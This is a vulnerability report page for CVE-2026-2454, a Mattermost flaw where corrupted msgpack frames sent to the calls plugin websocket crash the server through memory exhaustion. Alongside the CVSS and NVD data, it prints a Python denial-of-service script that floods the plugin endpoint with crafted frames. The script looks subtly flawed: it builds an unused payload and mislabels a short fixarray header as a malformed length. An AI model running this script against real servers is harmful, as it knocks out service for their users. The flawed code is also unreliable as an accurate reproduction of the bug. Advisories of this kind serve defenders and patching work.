Security Vulnerability Report
中文
CVE-2026-2454 CVSS 5.8 MEDIUM

CVE-2026-2454

Published: 2026-03-16 21:16:34
Last Modified: 2026-03-18 13:56:04
Source: [email protected]

Description

Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to handle incorrectly reported array lengths which allows malicious user to cause OOM errors and crash the server via sending corrupted msgpack frames within websocket messages to calls plugin. Mattermost Advisory ID: MMSA-2025-00537

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost 11.3.x <= 11.3.0
Mattermost 11.2.x <= 11.2.2
Mattermost 10.11.x <= 10.11.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import websocket import msgpack import struct import time # CVE-2026-2454 PoC - Mattermost msgpack OOM DoS # Target: Mattermost Calls Plugin WebSocket Endpoint def create_malicious_msgpack_frame(): """ Create a malicious msgpack frame with incorrect array length This can trigger OOM when Mattermost tries to allocate memory """ # Create a fixext type with malformed array length # msgpack fixarray with extremely large length malicious_data = msgpack.packb([0] * 1000000) # Large array # Alternatively, craft raw bytes with wrong type indicator # to trigger length parsing error crafted_frame = b'\x98' + b'\x00' * 1000000 # Fixarray with wrong length return crafted_frame def exploit_mattermost(target_url, channel_id): """ Exploit function to trigger CVE-2026-2454 """ ws_url = f"{target_url}/plugins/com.mattermost.calls/call/{channel_id}" try: ws = websocket.create_connection(ws_url) print(f"[+] Connected to {ws_url}") # Send malicious msgpack frame malicious_frame = create_malicious_msgpack_frame() for i in range(10): ws.send(malicious_frame) print(f"[+] Sent malicious frame {i+1}") time.sleep(0.5) ws.close() print("[+] Attack completed") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Configuration TARGET = "wss://your-mattermost-server.com" CHANNEL_ID = "your-channel-id" exploit_mattermost(TARGET, CHANNEL_ID)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2454", "sourceIdentifier": "[email protected]", "published": "2026-03-16T21:16:33.890", "lastModified": "2026-03-18T13:56:03.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to handle incorrectly reported array lengths which allows malicious user to cause OOM errors and crash the server via sending corrupted msgpack frames within websocket messages to calls plugin. Mattermost Advisory ID: MMSA-2025-00537"}, {"lang": "es", "value": "Las versiones de Mattermost 11.3.x &lt;= 11.3.0, 11.2.x &lt;= 11.2.2, 10.11.x &lt;= 10.11.10 fallan al manejar longitudes de array reportadas de forma incorrecta, lo que permite a un usuario malicioso causar errores OOM y colapsar el servidor mediante el envío de tramas msgpack corruptas dentro de mensajes websocket al plugin de llamadas. ID de Aviso de Mattermost: MMSA-2025-00537"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.1", "matchCriteriaId": "945A6E29-209F-4992-8692-BEF63DCB6B98"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.